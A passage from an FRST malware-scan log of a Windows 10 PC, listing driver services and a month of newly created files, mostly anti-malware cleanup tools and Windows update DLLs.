R1 SymNetS; C:\WINDOWS\System32\Drivers\N360x64\1608010.00E\SYMNETS.SYS [567512 2016-11-12] (Symantec Corporation)
S3 WdBoot; C:\WINDOWS\system32\drivers\WdBoot.sys [44056 2016-07-16] (Microsoft Corporation)
S3 WdFilter; C:\WINDOWS\system32\drivers\WdFilter.sys [290144 2016-07-16] (Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [123232 2016-07-16] (Microsoft Corporation)
R3 XSplit_Dummy; C:\WINDOWS\system32\drivers\xspltspk.sys [26200 2015-05-25] (SplitmediaLabs Limited)
R1 ZAM; C:\WINDOWS\System32\drivers\zam64.sys [203680 2016-12-12] (Zemana Ltd.)
R1 ZAM_Guard; C:\WINDOWS\System32\drivers\zamguard64.sys [203680 2016-12-12] (Zemana Ltd.)
R2 {687703DE-DC6D-4649-892B-B8497854A6AB}; C:\Program Files (x86)\CyberLink\PowerDVD15\Common\NavFilter\000.fcl [29896 2015-03-10] (CyberLink Corp.)
S3 NAVENG; \??\C:\Program Files (x86)\Norton 360\NortonData\22.5.4.24\Definitions\SDSDefs\20161209.001\ENG64.SYS [X]
S3 NAVEX15; \??\C:\Program Files (x86)\Norton 360\NortonData\22.5.4.24\Definitions\SDSDefs\20161209.001\EX64.SYS [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-12-12 14:52 - 2016-12-12 14:52 - 00026435 _____ C:\Users\Nathan\Downloads\FRST.txt
2016-12-12 14:51 - 2016-12-12 14:52 - 00000000 ____D C:\FRST
2016-12-12 14:50 - 2016-12-12 14:51 - 02420224 _____ (Farbar) C:\Users\Nathan\Downloads\FRST64.exe
2016-12-12 14:31 - 2016-12-12 14:31 - 34211496 _____ (Adlice Software ) C:\Users\Nathan\Downloads\setup (4).exe
2016-12-12 14:08 - 2016-12-12 14:08 - 00442396 _____ C:\WINDOWS\Minidump\121216-4109-01.dmp
2016-12-12 13:51 - 2016-12-12 14:31 - 00028272 _____ C:\WINDOWS\system32\Drivers\TrueSight.sys
2016-12-12 13:51 - 2016-12-12 14:31 - 00000859 _____ C:\Users\Public\Desktop\RogueKiller.lnk
2016-12-12 13:51 - 2016-12-12 14:31 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\RogueKiller
2016-12-12 13:51 - 2016-12-12 14:31 - 00000000 ____D C:\Program Files\RogueKiller
2016-12-12 13:50 - 2016-12-12 14:50 - 00000000 ____D C:\ProgramData\RogueKiller
2016-12-12 13:50 - 2016-12-12 13:50 - 34211496 _____ (Adlice Software ) C:\Users\Nathan\Downloads\setup (3).exe
2016-12-12 13:37 - 2016-12-12 13:37 - 00000000 ____D C:\Program Files\Reason
2016-12-12 13:36 - 2016-12-12 13:37 - 02827152 _____ (Reason Company Software Inc.) C:\Users\Nathan\Downloads\herdProtectScan_Portable.exe
2016-12-12 13:20 - 2016-11-23 22:04 - 50598533 _____ C:\Users\Nathan\Desktop\Soundnode.exe
2016-12-12 13:00 - 2016-12-12 14:51 - 00097274 _____ C:\WINDOWS\ZAM.krnl.trace
2016-12-12 13:00 - 2016-12-12 14:51 - 00054990 _____ C:\WINDOWS\ZAM_Guard.krnl.trace
2016-12-12 13:00 - 2016-12-12 13:00 - 05453544 _____ ( ) C:\Users\Nathan\Downloads\Zemana.AntiMalware.Setup.exe
2016-12-12 13:00 - 2016-12-12 13:00 - 00203680 _____ (Zemana Ltd.) C:\WINDOWS\system32\Drivers\zamguard64.sys
2016-12-12 13:00 - 2016-12-12 13:00 - 00203680 _____ (Zemana Ltd.) C:\WINDOWS\system32\Drivers\zam64.sys
2016-12-12 13:00 - 2016-12-12 13:00 - 00001217 _____ C:\Users\Public\Desktop\Zemana AntiMalware.lnk
2016-12-12 13:00 - 2016-12-12 13:00 - 00000000 ____D C:\Users\Nathan\AppData\Local\Zemana
2016-12-12 13:00 - 2016-12-12 13:00 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Zemana AntiMalware
2016-12-12 13:00 - 2016-12-12 13:00 - 00000000 ____D C:\Program Files (x86)\Zemana AntiMalware
2016-12-12 12:59 - 2016-12-12 12:59 - 00000000 ____D C:\Users\Nathan\AppData\Roaming\ProductData
2016-12-11 17:16 - 2016-12-11 17:16 - 00000662 _____ C:\RstHosts.txt
2016-12-11 17:15 - 2016-12-11 17:15 - 00353632 _____ C:\Users\Nathan\Downloads\rsthosts_2.0.exe
2016-12-11 17:15 - 2016-12-11 17:15 - 00353632 _____ C:\Users\Nathan\Downloads\rsthosts_2.0 (1).exe
2016-12-11 17:07 - 2016-12-11 17:07 - 01631928 _____ (Malwarebytes) C:\Users\Nathan\Downloads\JRT.exe
2016-12-11 17:03 - 2016-12-11 17:05 - 00000000 ____D C:\AdwCleaner
2016-12-11 17:03 - 2016-12-11 17:03 - 03968464 _____ C:\Users\Nathan\Downloads\adwcleaner_6.040.exe
2016-12-11 17:03 - 2016-12-11 17:03 - 00003140 _____ C:\WINDOWS\System32\Tasks\{7D50DE2D-8C63-E41E-4D44-FCDB07020749}
2016-12-11 17:02 - 2016-12-11 17:02 - 00002728 _____ C:\WINDOWS\System32\Tasks\Overwolf Updater Task
2016-12-11 16:59 - 2016-12-11 17:00 - 00003104 _____ C:\WINDOWS\System32\Tasks\Adobe Flash Player Updater
2016-12-11 16:59 - 2016-12-11 15:36 - 00715424 _____ (Sysinternals - www.sysinternals.com) C:\Users\Nathan\Desktop\Autoruns.exe
2016-12-11 16:52 - 2016-12-11 16:52 - 00000000 ____D C:\Users\Nathan\Downloads\backups
2016-12-11 16:35 - 2016-12-11 16:36 - 00000000 ____D C:\Users\Nathan\AppData\Roaming\IObit
2016-12-11 16:35 - 2016-12-11 16:35 - 00000000 ____D C:\Users\Nathan\AppData\Local\Avg
2016-12-11 16:34 - 2016-12-11 16:34 - 00000000 ____D C:\ProgramData\{BE2ACE5C-32B7-4777-9BDF-ECF87CDAB705}
2016-12-11 16:31 - 2016-12-11 16:36 - 00000000 ____D C:\AVG_Remover
2016-12-11 16:31 - 2016-12-11 16:31 - 08111408 _____ ( ) C:\Users\Nathan\Downloads\AVG_Remover.exe
2016-12-11 16:28 - 2016-12-11 16:28 - 02098199 _____ C:\Users\Nathan\Downloads\geek.7z
2016-12-11 16:28 - 2016-12-11 16:28 - 00000000 ____D C:\Users\Nathan\AppData\Roaming\Geek Uninstaller
2016-12-11 15:38 - 2016-12-11 15:39 - 00388608 _____ (Trend Micro Inc.) C:\Users\Nathan\Downloads\HijackThis.exe
2016-12-11 15:38 - 2016-12-11 15:38 - 00120688 _____ C:\Users\Nathan\Documents\DESKTOP-5GKAVDH.txt
2016-12-11 15:36 - 2016-12-11 15:37 - 08816398 _____ C:\Users\Nathan\Documents\DESKTOP-5GKAVDH.arn
2016-12-11 15:36 - 2016-12-11 15:37 - 01297494 _____ C:\Users\Nathan\Downloads\Autoruns.zip
2016-12-11 15:35 - 2016-12-11 15:35 - 00040904 _____ C:\Users\Nathan\Downloads\MTB.txt
2016-12-11 15:34 - 2016-12-11 15:34 - 00892416 _____ (Farbar) C:\Users\Nathan\Downloads\MiniToolBox.exe
2016-12-11 15:33 - 2016-12-11 16:35 - 00000000 ____D C:\Program Files\Google
2016-12-11 15:33 - 2016-12-11 15:33 - 00000797 _____ C:\Users\Public\Desktop\Speccy.lnk
2016-12-11 15:33 - 2016-12-11 15:33 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Speccy
2016-12-11 15:33 - 2016-12-11 15:33 - 00000000 ____D C:\Program Files\Speccy
2016-12-11 15:32 - 2016-12-11 15:32 - 06293184 _____ (Piriform Ltd) C:\Users\Nathan\Downloads\spsetup130.exe
2016-12-11 15:32 - 2016-12-11 15:32 - 06293184 _____ (Piriform Ltd) C:\Users\Nathan\Downloads\spsetup130 (1).exe
2016-12-11 14:50 - 2016-12-11 14:50 - 00000000 ____D C:\Users\Nathan\Documents\Frontier Developments
2016-12-11 14:50 - 2016-12-11 14:50 - 00000000 ____D C:\Users\Nathan\AppData\Roaming\Frontier Developments
2016-12-11 14:50 - 2016-12-11 14:50 - 00000000 ____D C:\Users\Nathan\AppData\Local\Frontier Developments
2016-12-11 14:39 - 2016-12-11 14:39 - 00000222 _____ C:\Users\Nathan\Desktop\Planet Coaster.url
2016-12-09 19:31 - 2016-12-09 19:31 - 00000221 _____ C:\Users\Nathan\Desktop\Total War SHOGUN 2.url
2016-12-09 15:56 - 2016-11-11 10:22 - 00590960 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioSes.dll
2016-12-09 15:56 - 2016-11-11 10:15 - 00198856 _____ (Microsoft Corporation) C:\WINDOWS\system32\wscapi.dll
2016-12-09 15:56 - 2016-11-11 10:14 - 02482280 _____ (Microsoft Corporation) C:\WINDOWS\system32\msmpeg2vdec.dll
2016-12-09 15:56 - 2016-11-11 10:14 - 02186896 _____ (Microsoft Corporation) C:\WINDOWS\system32\hevcdecoder.dll
2016-12-09 15:56 - 2016-11-11 10:14 - 00603488 _____ (Microsoft Corporation) C:\WINDOWS\system32\ContentDeliveryManager.Utilities.dll
2016-12-09 15:56 - 2016-11-11 10:13 - 07816032 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2016-12-09 15:56 - 2016-11-11 10:13 - 01886344 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll
2016-12-09 15:56 - 2016-11-11 10:13 - 00352096 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\fastfat.sys
2016-12-09 15:56 - 2016-11-11 10:12 - 00128352 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\partmgr.sys
2016-12-09 15:56 - 2016-11-11 10:10 - 02681200 _____ C:\WINDOWS\system32\CoreUIComponents.dll
2016-12-09 15:56 - 2016-11-11 10:09 - 00764392 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreMessaging.dll
2016-12-09 15:56 - 2016-11-11 10:03 - 01069720 _____ (Microsoft Corporation) C:\WINDOWS\system32\MrmCoreR.dll
2016-12-09 15:56 - 2016-11-11 10:03 - 00266544 _____ (Microsoft Corporation) C:\WINDOWS\system32\policymanager.dll
2016-12-09 15:56 - 2016-11-11 10:02 - 02828376 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3d11.dll
2016-12-09 15:56 - 2016-11-11 10:02 - 00360040 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettingsAdminFlows.exe
2016-12-09 15:56 - 2016-11-11 10:01 - 01859264 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.dll
2016-12-09 15:56 - 2016-11-11 10:01 - 01293152 _____ (Microsoft Corporation) C:\WINDOWS\system32\LicenseManager.dll
2016-12-09 15:56 - 2016-11-11 10:01 - 00637400 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxgi.dll
2016-12-09 15:56 - 2016-11-11 10:00 - 00219488 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tpm.sys
2016-12-09 15:56 - 2016-11-11 09:57 - 22224480 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2016-12-09 15:56 - 2016-11-11 09:57 - 08170048 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll
2016-12-09 15:56 - 2016-11-11 09:56 - 00534096 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEng.dll
2016-12-09 15:56 - 2016-11-11 09:56 - 00424616 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFPlay.dll
2016-12-09 15:56 - 2016-11-11 09:56 - 00418952 _____ (Microsoft Corporation) C:\WINDOWS\system32\AUDIOKSE.dll
2016-12-09 15:56 - 2016-11-11 09:56 - 00241496 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHost.dll
2016-12-09 15:56 - 2016-11-11 09:56 - 00163752 _____ (Microsoft Corporation) C:\WINDOWS\system32\RTWorkQ.dll
2016-12-09 15:56 - 2016-11-11 09:54 - 01418312 _____ (Microsoft Corporation) C:\WINDOWS\system32\msctf.dll
2016-12-09 15:56 - 2016-11-11 09:51 - 00454592 _____ (Microsoft Corporation) C:\WINDOWS\system32\services.exe
2016-12-09 15:56 - 2016-11-11 09:31 - 00366080 _____ (Microsoft Corporation) C:\WINDOWS\system32\RDXTaskFactory.dll
2016-12-09 15:56 - 2016-11-11 09:29 - 01631232 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Resources.dll
2016-12-09 15:56 - 2016-11-11 09:27 - 00206848 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32k.sys
2016-12-09 15:56 - 2016-11-11 09:26 - 00258560 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\xboxgip.sys
2016-12-09 15:56 - 2016-11-11 09:26 - 00163840 _____ (Microsoft Corporation) C:\WINDOWS\system32\EnterpriseModernAppMgmtCSP.dll
2016-12-09 15:56 - 2016-11-11 09:26 - 00109056 _____ (Microsoft Corporation) C:\WINDOWS\system32\ReportingCSP.dll
2016-12-09 15:56 - 2016-11-11 09:25 - 00147968 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmcertinst.exe
2016-12-09 15:56 - 2016-11-11 09:25 - 00081408 _____ (Microsoft Corporation) C:\WINDOWS\system32\HttpsDataSource.dll
2016-12-09 15:56 - 2016-11-11 09:25 - 00073216 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepositoryBroker.dll
2016-12-09 15:56 - 2016-11-11 09:24 - 00158720 _____ (Microsoft Corporation) C:\WINDOWS\system32\VEStoreEventHandlers.dll
2016-12-09 15:56 - 2016-11-11 09:24 - 00122880 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepositoryClient.dll
2016-12-09 15:56 - 2016-11-11 09:24 - 00110080 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.BackgroundTransfer.BackgroundManagerPolicy.dll
2016-12-09 15:56 - 2016-11-11 09:24 - 00098304 _____ (Microsoft Corporation) C:\WINDOWS\system32\browserbroker.dll
2016-12-09 15:56 - 2016-11-11 09:23 - 00409088 _____ (Microsoft Corporation) C:\WINDOWS\system32\NgcCtnr.dll
2016-12-09 15:56 - 2016-11-11 09:23 - 00058880 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Shell.Search.UriHandler.dll
2016-12-09 15:56 - 2016-11-11 09:23 - 00041472 _____ (Microsoft Corporation) C:\WINDOWS\system32\EAMProgressHandler.dll
2016-12-09 15:56 - 2016-11-11 09:22 - 00211968 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgent.exe
2016-12-09 15:56 - 2016-11-11 09:22 - 00143360 _____ (Microsoft Corporation) C:\WINDOWS\system32\EDPCleanup.exe
2016-12-09 15:56 - 2016-11-11 09:21 - 00748544 _____ (Microsoft Corporation) C:\WINDOWS\system32\StoreAgent.dll
2016-12-09 15:56 - 2016-11-11 09:21 - 00379392 _____ (Microsoft Corporation) C:\WINDOWS\system32\apprepsync.dll
2016-12-09 15:56 - 2016-11-11 09:21 - 00324096 _____ (Microsoft Corporation) C:\WINDOWS\system32\domgmt.dll
2016-12-09 15:56 - 2016-11-11 09:20 - 00641024 _____ (Microsoft Corporation) C:\WINDOWS\system32\ngccredprov.dll
2016-12-09 15:56 - 2016-11-11 09:20 - 00574464 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_StorageSense.dll
2016-12-09 15:56 - 2016-11-11 09:20 - 00407552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Management.dll
2016-12-09 15:56 - 2016-11-11 09:20 - 00381952 _____ (Microsoft Corporation) C:\WINDOWS\system32\cryptngc.dll
2016-12-09 15:56 - 2016-11-11 09:20 - 00260608 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgentUserBroker.exe
2016-12-09 15:56 - 2016-11-11 09:20 - 00176128 _____ (Microsoft Corporation) C:\WINDOWS\system32\apprepapi.dll
2016-12-09 15:56 - 2016-11-11 09:19 - 00411648 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdpsvc.dll
2016-12-09 15:56 - 2016-11-11 09:19 - 00389632 _____ (Microsoft Corporation) C:\WINDOWS\system32\ActivationManager.dll
2016-12-09 15:56 - 2016-11-11 09:19 - 00366080 _____ (Microsoft Corporation) C:\WINDOWS\system32\SearchFolder.dll
2016-12-09 15:56 - 2016-11-11 09:19 - 00320000 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.TestingFramework.dll
2016-12-09 15:56 - 2016-11-11 09:19 - 00285696 _____ (Microsoft Corporation) C:\WINDOWS\system32\EnterpriseAppMgmtSvc.dll
2016-12-09 15:56 - 2016-11-11 09:18 - 17188352 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.dll
2016-12-09 15:56 - 2016-11-11 09:18 - 02084352 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceFlows.DataModel.dll
2016-12-09 15:56 - 2016-11-11 09:18 - 00425984 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadcloudap.dll
2016-12-09 15:56 - 2016-11-11 09:18 - 00278016 _____ (Microsoft Corporation) C:\WINDOWS\system32\netplwiz.dll
2016-12-09 15:56 - 2016-11-11 09:17 - 01220096 _____ (Microsoft Corporation) C:\WINDOWS\system32\wscui.cpl
2016-12-09 15:56 - 2016-11-11 09:17 - 01004032 _____ (Microsoft Corporation) C:\WINDOWS\system32\enterprisecsps.dll
2016-12-09 15:56 - 2016-11-11 09:17 - 00956416 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.desktop.dll
2016-12-09 15:56 - 2016-11-11 09:17 - 00410112 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentClient.dll
2016-12-09 15:56 - 2016-11-11 09:16 - 00560128 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppReadiness.dll
2016-12-09 15:56 - 2016-11-11 09:16 - 00184832 _____ (Microsoft Corporation) C:\WINDOWS\system32\wscsvc.dll
2016-12-09 15:56 - 2016-11-11 09:15 - 00159232 _____ (Microsoft Corporation) C:\WINDOWS\system32\wscinterop.dll
2016-12-09 15:56 - 2016-11-11 09:14 - 02104320 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlidsvc.dll
2016-12-09 15:56 - 2016-11-11 09:14 - 00615424 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpnprv.dll
2016-12-09 15:56 - 2016-11-11 09:13 - 00306176 _____ (Microsoft Corporation) C:\WINDOWS\system32\msdtcuiu.dll
2016-12-09 15:56 - 2016-11-11 09:11 - 00942080 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll
2016-12-09 15:56 - 2016-11-11 09:11 - 00337920 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEndpointBuilder.dll
2016-12-09 15:56 - 2016-11-11 09:08 - 00981504 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Security.Authentication.OnlineId.dll
2016-12-09 15:56 - 2016-11-11 09:08 - 00539136 _____ (Microsoft Corporation) C:\WINDOWS\system32\PlayToManager.dll
2016-12-09 15:56 - 2016-11-11 09:07 - 02510848 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetworkMobileSettings.dll
2016-12-09 15:56 - 2016-11-11 09:07 - 01692672 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll
2016-12-09 15:56 - 2016-11-11 09:07 - 00991232 _____ (Microsoft Corporation) C:\WINDOWS\system32\comdlg32.dll
2016-12-09 15:56 - 2016-11-11 09:07 - 00347648 _____ (Microsoft Corporation) C:\WINDOWS\system32\rascustom.dll
2016-12-09 15:56 - 2016-11-11 09:06 - 02275840 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2016-12-09 15:56 - 2016-11-11 09:06 - 00960000 _____ (Microsoft Corporation) C:\WINDOWS\system32\modernexecserver.dll
2016-12-09 15:56 - 2016-11-11 09:06 - 00650752 _____ (Microsoft Corporation) C:\WINDOWS\system32\RDXService.dll
2016-12-09 15:56 - 2016-11-11 09:05 - 04136448 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepository.dll
2016-12-09 15:56 - 2016-11-11 09:05 - 02852864 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettingsThresholdAdminFlowUI.dll
2016-12-09 15:56 - 2016-11-11 09:04 - 02800128 _____ (Microsoft Corporation) C:\WINDOWS\system32\netshell.dll
2016-12-09 15:56 - 2016-11-11 09:04 - 01359360 _____ (Microsoft Corporation) C:\WINDOWS\system32\usercpl.dll
2016-12-09 15:56 - 2016-11-11 09:04 - 01232384 _____ (Microsoft Corporation) C:\WINDOWS\system32\dosvc.dll
2016-12-09 15:56 - 2016-11-11 09:04 - 00909312 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Search.dll
2016-12-09 15:56 - 2016-11-11 09:04 - 00455168 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmenrollengine.dll
2016-12-09 15:56 - 2016-11-11 09:04 - 00172544 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceEnroller.exe
2016-12-09 15:56 - 2016-11-11 09:03 - 03616768 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2016-12-09 15:56 - 2016-11-11 09:03 - 00842240 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntshrui.dll
2016-12-09 15:56 - 2016-11-11 09:03 - 00717824 _____ (Microsoft Corporation) C:\WINDOWS\system32\LogonController.dll
2016-12-09 15:56 - 2016-11-11 09:03 - 00716800 _____ (Microsoft Corporation) C:\WINDOWS\system32\ShareHost.dll
2016-12-09 15:56 - 2016-11-11 09:03 - 00187392 _____ (Microsoft Corporation) C:\WINDOWS\system32\mdmregistration.dll
2016-12-09 15:56 - 2016-11-11 09:02 - 03542016 _____ (Microsoft Corporation) C:\WINDOWS\system32\actxprxy.dll
2016-12-09 15:56 - 2016-11-11 09:02 - 01726976 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Immersive.dll
2016-12-09 15:56 - 2016-11-11 09:01 - 01107456 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadtb.dll
2016-12-09 15:56 - 2016-11-11 08:39 - 00484584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AudioSes.dll
2016-12-09 15:56 - 2016-11-11 07:59 - 01572768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntdll.dll
2016-12-09 15:56 - 2016-11-11 07:56 - 02048496 _____ C:\WINDOWS\SysWOW64\CoreUIComponents.dll
2016-12-09 15:56 - 2016-11-11 07:49 - 00263472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Storage.ApplicationData.dll
2016-12-09 15:56 - 2016-11-11 07:48 - 02277248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3d11.dll
2016-12-09 15:56 - 2016-11-11 07:47 - 01503032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecs.dll
2016-12-09 15:56 - 2016-11-11 07:47 - 00527880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxgi.dll
2016-12-09 15:56 - 2016-11-11 07:42 - 03892864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfcore.dll
2016-12-09 15:56 - 2016-11-11 07:42 - 01852720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmp4srcsnk.dll
2016-12-09 15:56 - 2016-11-11 07:42 - 01123912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfplat.dll
2016-12-09 15:56 - 2016-11-11 07:42 - 00952416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsvr.dll
2016-12-09 15:56 - 2016-11-11 07:42 - 00382784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AUDIOKSE.dll
2016-12-09 15:56 - 2016-11-11 07:42 - 00152416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\RTWorkQ.dll
2016-12-09 15:56 - 2016-11-11 07:42 - 00091936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfaudiocnv.dll
2016-12-09 15:56 - 2016-11-11 07:41 - 00157536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudStorageWizard.exe
2016-12-09 15:56 - 2016-11-11 07:38 - 01263856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msctf.dll
2016-12-09 15:56 - 2016-11-11 07:28 - 01631232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.Resources.dll
2016-12-09 15:56 - 2016-11-11 07:27 - 00034304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LaunchWinApp.exe
2016-12-09 15:56 - 2016-11-11 07:26 - 00147968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32k.sys
2016-12-09 15:56 - 2016-11-11 07:25 - 00117248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapsBtSvc.dll
2016-12-09 15:56 - 2016-11-11 07:25 - 00071168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MosStorage.dll
2016-12-09 15:56 - 2016-11-11 07:24 - 00156672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BcastDVRHelper.dll
2016-12-09 15:56 - 2016-11-11 07:24 - 00138240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DisplayManager.dll
2016-12-09 15:56 - 2016-11-11 07:24 - 00047104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Shell.Search.UriHandler.dll
2016-12-09 15:56 - 2016-11-11 07:23 - 00140288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppCapture.dll
2016-12-09 15:56 - 2016-11-11 07:23 - 00094208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.StateRepositoryClient.dll
2016-12-09 15:56 - 2016-11-11 07:22 - 00505856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\bcastdvr.exe
2016-12-09 15:56 - 2016-11-11 07:21 - 00332288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapConfiguration.dll
2016-12-09 15:56 - 2016-11-11 07:19 - 13868544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.dll
2016-12-09 15:56 - 2016-11-11 07:19 - 01755136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DeviceFlows.DataModel.dll
2016-12-09 15:56 - 2016-11-11 07:19 - 00506880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DevicePairing.dll
2016-12-09 15:56 - 2016-11-11 07:19 - 00313856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppXDeploymentClient.dll
2016-12-09 15:56 - 2016-11-11 07:19 - 00298496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Internal.Management.dll
2016-12-09 15:56 - 2016-11-11 07:19 - 00284672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\apprepsync.dll
2016-12-09 15:56 - 2016-11-11 07:19 - 00125952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\apprepapi.dll
2016-12-09 15:56 - 2016-11-11 07:18 - 02333184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WsmSvc.dll
2016-12-09 15:56 - 2016-11-11 07:18 - 01336320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wsecedit.dll
2016-12-09 15:56 - 2016-11-11 07:18 - 00431616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\efswrt.dll
2016-12-09 15:56 - 2016-11-11 07:17 - 00333312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ActivationManager.dll
2016-12-09 15:56 - 2016-11-11 07:17 - 00033280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WSManHTTPConfig.exe
2016-12-09 15:56 - 2016-11-11 07:15 - 07626752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
2016-12-09 15:56 - 2016-11-11 07:15 - 04612608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.dll
2016-12-09 15:56 - 2016-11-11 07:15 - 01357824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UIAutomationCore.dll
2016-12-09 15:56 - 2016-11-11 07:15 - 00838144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\JpMapControl.dll
2016-12-09 15:56 - 2016-11-11 07:15 - 00348672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\zipfldr.dll
2016-12-09 15:56 - 2016-11-11 07:11 - 03306496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFMediaEngine.dll
2016-12-09 15:56 - 2016-11-11 07:10 - 06109184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mos.dll
2016-12-09 15:56 - 2016-11-11 07:09 - 05380608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BingMaps.dll
2016-12-09 15:56 - 2016-11-11 07:09 - 00545280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmkvsrcsnk.dll
2016-12-09 15:56 - 2016-11-11 07:06 - 06474752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mspaint.exe
2016-12-09 15:56 - 2016-11-11 07:06 - 02362880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapRouter.dll
